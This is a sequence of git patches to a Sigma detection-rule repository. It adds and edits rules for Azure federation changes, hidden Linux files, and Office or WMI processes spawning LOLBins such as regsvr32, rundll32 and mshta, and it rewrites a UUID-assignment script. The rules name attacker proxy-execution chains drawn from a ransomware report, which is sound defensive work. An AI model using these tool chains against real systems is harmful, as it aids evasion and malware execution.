30 ++++++++++++--------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index aec2c262..65b7b8f3 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -10,9 +10,23 @@ tags: - attack.t1050 # an old one - attack.t1543.003 date: 2017/11/01 -modified: 2020/08/23 -author: Thomas Patzke +modified: 2020/09/05 +author: Thomas Patzke , frack113 (reorder file) --- +#First detection is only need to the near so level is informational to not trigger an alert +id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 +logsource: + category: process_creation + product: windows +detection: + process: + Image: + - 'C:\Program Files(x86)\Google\GoogleService.exe' + - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' + condition: process +level: informational +--- +action: repeat id: c069f460-2b87-4010-8dcf-e45bab362624 logsource: product: windows @@ -26,17 +40,7 @@ detection: falsepositives: - Unknown level: high ---- -id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 -logsource: - category: process_creation - product: windows -detection: - process: - Image: - - 'C:\Program Files(x86)\Google\GoogleService.exe' - - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' fields: - ComputerName - User - - CommandLine + - CommandLine \ No newline at end of file From b0964250b1142c9e6613560b3d01035b00449b5a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:23:45 +0200 Subject: [PATCH 0747/1367] Update win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 65b7b8f3..562bec73 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -12,9 +12,6 @@ tags: date: 2017/11/01 modified: 2020/09/05 author: Thomas Patzke , frack113 (reorder file) ---- -#First detection is only need to the near so level is informational to not trigger an alert -id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 logsource: category: process_creation product: windows @@ -23,10 +20,9 @@ detection: Image: - 'C:\Program Files(x86)\Google\GoogleService.exe' - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' - condition: process +#First detection is only need to the near so level is informational to not trigger an alert level: informational --- -action: repeat id: c069f460-2b87-4010-8dcf-e45bab362624 logsource: product: windows From 44a5792be3e3261f23eb01cc5d7181d39dd7835a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 5 Sep 2021 12:34:24 +0200 Subject: [PATCH 0748/1367] Revert win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 32 +++++++++------------ 1 file changed, 13 insertions(+), 19 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 65b7b8f3..60622027 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -10,24 +10,8 @@ tags: - attack.t1050 # an old one - attack.t1543.003 date: 2017/11/01 -modified: 2020/09/05 -author: Thomas Patzke , frack113 (reorder file) ---- -#First detection is only need to the near so level is informational to not trigger an alert -id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 -logsource: - category: process_creation - product: windows -detection: - process: - Image: - - 'C:\Program Files(x86)\Google\GoogleService.exe' - - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' - condition: process -level: informational ---- -action: repeat -id: c069f460-2b87-4010-8dcf-e45bab362624 +modified: 2020/08/23 +author: Thomas Patzke logsource: product: windows service: system @@ -40,7 +24,17 @@ detection: falsepositives: - Unknown level: high +--- +id: c069f460-2b87-4010-8dcf-e45bab362624 +logsource: + category: process_creation + product: windows +detection: + process: + Image: + - 'C:\Program Files(x86)\Google\GoogleService.exe' + - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' fields: - ComputerName - User - - CommandLine \ No newline at end of file + - CommandLine From c82a652a3462a95ad433d8d3dad6a0b809dfb73e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:37:30 +0200 Subject: [PATCH 0749/1367] Revert win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 26 ++++++++++----------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 562bec73..45af1e2d 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -10,20 +10,8 @@ tags: - attack.t1050 # an old one - attack.t1543.003 date: 2017/11/01 -modified: 2020/09/05 -author: Thomas Patzke , frack113 (reorder file) -logsource: - category: process_creation - product: windows -detection: - process: - Image: - - 'C:\Program Files(x86)\Google\GoogleService.exe' - - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' -#First detection is only need to the near so level is informational to not trigger an alert -level: informational ---- -id: c069f460-2b87-4010-8dcf-e45bab362624 +modified: 2020/08/23 +author: Thomas Patzke logsource: product: windows service: system @@ -36,6 +24,16 @@ detection: falsepositives: - Unknown level: high +--- +id: c069f460-2b87-4010-8dcf-e45bab362624 +logsource: + category: process_creation + product: windows +detection: + process: + Image: + - 'C:\Program Files(x86)\Google\GoogleService.exe' + - 'C:\Program Files(x86)\Google\GoogleUpdate.exe' fields: - ComputerName - User From dc88ad7c73a01280a0a9604e23fc238613cef6ee Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 17:50:54 +0200 Subject: [PATCH 0750/1367] fix sigma_uuid assign id --- tools/sigma/sigma_uuid.py | 51 +++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 29 deletions(-) diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index ce0f9ab6..4b9b7fc4 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py @@ -18,15 +18,10 @@ from argparse import ArgumentParser from pathlib import Path from uuid import uuid4, UUID import ruamel.yaml -from sigma.output import SigmaYAMLDumper - def print_verbose(*arg, **kwarg): print(*arg, **kwarg) -# Define order-preserving representer from dicts/maps -def yaml_preserve_order(self, dict_data): - return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) def valid_id(rule,i,path): try: @@ -45,16 +40,6 @@ def is_global(rule): return True return False -def is_id_uuid(rule): - if 'id' in rule: - try: - UUID(rule["id"]) - except ValueError: - return False - return True - return False - - def main(): argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") @@ -72,7 +57,6 @@ def main(): else: paths = [ Path(pathname) for pathname in args.inputs ] - uuids = set() passed = True for path in paths: print_verbose("Rule {}".format(str(path))) @@ -91,27 +75,36 @@ def main(): passed = False i += 1 else: - newrules = list() changed = False i = 1 for rule in rules: - if "title" in rule and "id" not in rule: # only assign id to rules that have a title and no id - newrule = dict() - changed = True - for k, v in rule.items(): - newrule[k] = v - if k == "title": # insert id after title - uuid = uuid4() - newrule["id"] = str(uuid) - print("Assigned UUID '{}' to rule {} in file {}.".format(uuid, i, str(path))) - newrules.append(newrule) + if is_global(rule): + if 'id' in rule: + uuid = rule['id'] + del rule['id'] + print("Remove Global UUID '{}' to rule {} in file {}.".format(str(uuid), i, str(path))) + changed = True else: - newrules.append(rule) + if 'id' in rule: + if not valid_id(rule,i,path): + uuid = uuid4() + rule['id'] = str(uuid) + changed = True + print("Change bad UUID '{}' to rule {} in file {}.".format(str(uuid), i, str(path))) + else: + pos= 1 if 'title' in rule else 0 #put id in after title is need + uuid = uuid4() + rule.insert(pos,"id",str(uuid)) + changed = True + print("Assigned UUID '{}' to rule {} in file {}.".format(str(uuid), i, str(path))) i += 1 if changed: with path.open("w") as f: - yaml.dump_all(newrules, f, Dumper=SigmaYAMLDumper, indent=4, width=160, default_flow_style=False) + for rule in rules: + start= False if is_global(rule) else True + if len(rules) == 1: start= False # avoid --- if only one rule + ruamel.yaml.round_trip_dump(rule,stream=f,indent=4,block_seq_indent=4,explicit_start=start) if not passed: print("The Sigma rules listed above don't have an ID. The ID must be:") From 6025df63ee197f3a23b071d3ba2d22a18f41d5bc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 6 Sep 2021 11:06:58 -0500 Subject: [PATCH 0751/1367] Create azure_federation_modified.yml --- .../cloud/azure/azure_federation_modified.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_federation_modified.yml diff --git a/rules/cloud/azure/azure_federation_modified.yml b/rules/cloud/azure/azure_federation_modified.yml new file mode 100644 index 00000000..37b7f585 --- /dev/null +++ b/rules/cloud/azure/azure_federation_modified.yml @@ -0,0 +1,23 @@ +title: Azure Domain Federation Settings Modified +id: 352a54e1-74ba-4929-9d47-8193d67aba1e +description: Identifies when an user or application modified the federation settings on the domain. +author: Austin Songer +status: experimental +date: 2021/09/06 +references: + - https://attack.mitre.org/techniques/T1078/ +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: Set federation settings on domain + condition: selection +level: medium +tags: + - attack.initial_access + - attack.t1078 +falsepositives: + - Federation Settings being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From e6e3fc2eec44a2238ee5dfa7ebb01355f5a31dd8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 6 Sep 2021 11:16:35 -0500 Subject: [PATCH 0752/1367] Update azure_federation_modified.yml --- rules/cloud/azure/azure_federation_modified.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_federation_modified.yml b/rules/cloud/azure/azure_federation_modified.yml index 37b7f585..f5b0eee4 100644 --- a/rules/cloud/azure/azure_federation_modified.yml +++ b/rules/cloud/azure/azure_federation_modified.yml @@ -7,7 +7,7 @@ date: 2021/09/06 references: - https://attack.mitre.org/techniques/T1078/ logsource: - service: azure.activitylogs + service: azure.signinlogs detection: selection: properties.message: Set federation settings on domain From 0de95e355a41bfb2c8d96f77d7754a66f97cc302 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 6 Sep 2021 11:31:52 -0500 Subject: [PATCH 0753/1367] Update azure_federation_modified.yml --- rules/cloud/azure/azure_federation_modified.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure/azure_federation_modified.yml b/rules/cloud/azure/azure_federation_modified.yml index f5b0eee4..bc627c97 100644 --- a/rules/cloud/azure/azure_federation_modified.yml +++ b/rules/cloud/azure/azure_federation_modified.yml @@ -5,7 +5,7 @@ author: Austin Songer status: experimental date: 2021/09/06 references: - - https://attack.mitre.org/techniques/T1078/ + - https://attack.mitre.org/techniques/T1078 logsource: service: azure.signinlogs detection: @@ -20,4 +20,4 @@ falsepositives: - Federation Settings being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - + From ef3efd8fd348596541124c444b80a463025d073b Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Mon, 6 Sep 2021 18:37:02 +0200 Subject: [PATCH 0754/1367] New Rule Linux - Hidden Files and Directories --- .../lnx_auditd_hidden_files_directories.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_hidden_files_directories.yml diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml new file mode 100644 index 00000000..0f172ebb --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -0,0 +1,31 @@ +title: Hidden Files and Directoriese +id: d08722cd-3d09-449a-80b4-83ea2d9d4616 +description: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character +author: 'Pawel Mazur' +status: experimental +date: 2021/09/06 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md + - https://attack.mitre.org/techniques/T1564/001/ +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: + - mkdir + - touch + - vim + - nano + - vi + arguments: + - a1|re: '\.(.*)' + - a2|re: '\.(.*)' #in case there are some other arguments being used in a1 + condition: commands and arguments +tags: + - attack.defenseevasion + - attack.t1564.001 +falsepositives: + - None +level: low \ No newline at end of file From 9f5f25e480721b77497bb23b80a9bff58825d0a9 Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Mon, 6 Sep 2021 18:40:39 +0200 Subject: [PATCH 0755/1367] New Rule - Linux Hidden Files and Directories --- rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml index 0f172ebb..af9b62e5 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -28,4 +28,4 @@ tags: - attack.t1564.001 falsepositives: - None -level: low \ No newline at end of file +level: low From 7c2895c73fe7140ff94458a14137afc9560c083b Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Mon, 6 Sep 2021 18:43:49 +0200 Subject: [PATCH 0756/1367] New Rule - Linux Hidden Files and Directories --- rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml index af9b62e5..c36567a5 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -21,7 +21,7 @@ detection: - vi arguments: - a1|re: '\.(.*)' - - a2|re: '\.(.*)' #in case there are some other arguments being used in a1 + - a2|re: '\.(.*)' # in case there are some other arguments being used in a1 condition: commands and arguments tags: - attack.defenseevasion From e9fa5bde2be9f3d48eb4e3f7c86432f416b9f700 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Mon, 6 Sep 2021 18:55:58 +0200 Subject: [PATCH 0757/1367] Update lnx_auditd_hidden_files_directories.yml Correction of tag --- rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml index c36567a5..ec1dac52 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -24,7 +24,7 @@ detection: - a2|re: '\.(.*)' # in case there are some other arguments being used in a1 condition: commands and arguments tags: - - attack.defenseevasion + - attack.defense_evasion - attack.t1564.001 falsepositives: - None From 3b95b0c913289ecff773f52f15916d848dda1078 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 6 Sep 2021 20:56:41 +0200 Subject: [PATCH 0758/1367] Remove useless Eventid Use tools/config/generic/windows-audit.yml to convert for security 4688 --- ...ocess_Creations_by_Office_applications.yml | 23 ++++++++----------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 009f56a8..287a7208 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,5 @@ title: Created Executables and Files by Office Applications +id: a9505d16-644f-4f24-9002-7c322675e40d description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -11,29 +12,25 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: security category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: security - EventID: 4688 - selection2: - NewProcessName|endswith: + Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: - ParentProcessName|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 + selection2: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 falsepositives: -- Unknown + - Unknown level: high From 9ef299c4f42a367062e64187640863eeed7520be Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 6 Sep 2021 21:07:49 +0200 Subject: [PATCH 0759/1367] Change to LF --- ...creations_with_Wmiprvse_parent_process.yml | 74 +++++++------- ..._proxy executing_regsvr32_with_payload.yml | 94 +++++++++--------- ...Applications_Spawning_WMI_command-line.yml | 72 +++++++------- ...mmand_execution_by_Office_Applications.yml | 64 ++++++------ ...ice_applications_using_file_extentions.yml | 98 +++++++++---------- ...ocess_Creations_by_Office_applications.yml | 74 +++++++------- ...creations_with_Wmiprvse_parent_process.yml | 70 ++++++------- ..._proxy_executing_regsvr32_with_payload.yml | 94 +++++++++--------- 8 files changed, 320 insertions(+), 320 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 62db1db1..f567b8d6 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,37 +1,37 @@ -title: Lolbins Process Creation with WmiPrvse -description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - service: security - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventLog: security - EventID: 4688 - selection2: - NewProcessName|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection3: - ParentProcessName|endswith: - - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 -falsepositives: -- Unknown -level: high +title: Lolbins Process Creation with WmiPrvse +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + NewProcessName|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentProcessName|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 6842e7ca..f4797751 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -1,47 +1,47 @@ -title: Excel Proxy Executing Regsvr32 With Payload -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - service: security - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventLog: security - EventID: 4688 - selection2: - ProcessCommandLine: - - '*regsvr32*' - - '*rundll32*' - - '*msiexec*' - - '*mshta*' - - '*verclsid*' - selection3: - - ProcessName: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' - selection4: - ParentProcessName|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - selection5: - processCommandLine|contains|all: - - 'process' - - 'create' - - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 -falsepositives: -- Unknown -level: high +title: Excel Proxy Executing Regsvr32 With Payload +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + ProcessCommandLine: + - '*regsvr32*' + - '*rundll32*' + - '*msiexec*' + - '*mshta*' + - '*verclsid*' + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + ParentProcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 845e84e2..57d0d164 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -1,36 +1,36 @@ -title: Office Applications Spawning Wmi Cli -description: Initial execution of malicious document calls wmic to execute the file with regsvr32 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: windows - service: security - category: process_creation -detection: - #useful_information: Add more office applications to the rule logic of choice - selection1: - - EventLog: security - selection2: - - EventID: 4688 - selection3: - - ProcessName: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' - selection4: - - ParentProcessName: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 AND selection4 -falsepositives: -- Unknown -level: high +title: Office Applications Spawning Wmi Cli +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + service: security + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + selection1: + - EventLog: security + selection2: + - EventID: 4688 + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + - ParentProcessName: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 AND selection4 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 0b20eece..4e96dc74 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -1,32 +1,32 @@ -title: WMI Command Execution by Office Applications -description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: EndPoint Detection Logs - category: process_creation -detection: - #useful_information: Add more office applications to the rule logic of choice - selection1: - EventLog: EDR - EventType: WMIExecution - WMIcommand: '*Win32_Process\:\:Create*' - selection2: - - Image: - - '*\winword.exe' - - '*\excel.exe' - - '*\powerpnt.exe' - condition: selection1 AND selection2 -falsepositives: -- Unknown -level: high +title: WMI Command Execution by Office Applications +description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: EndPoint Detection Logs + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + selection1: + EventLog: EDR + EventType: WMIExecution + WMIcommand: '*Win32_Process\:\:Create*' + selection2: + - Image: + - '*\winword.exe' + - '*\excel.exe' + - '*\powerpnt.exe' + condition: selection1 AND selection2 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index e2411d65..6a568b55 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,49 +1,49 @@ -title: Executable and Files creation by Office Applications -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - service: Sysmon - category: process_creation -detection: - #useful_information: Please add more file extentions and magic bytes to the logic of your choice. - selection1: - EventType: - - FileCreate - - FileRename - EventID: 11 - selection2: - Image|endswith: - - 'winword.exe' - - 'excel.exe' - - 'powerpnt.exe' - selection3: - FileName|endswith: - - ".exe" - - ".dll" - - ".ocx" - - ".com" - - ".ps1" - - ".vbs" - - ".sys" - 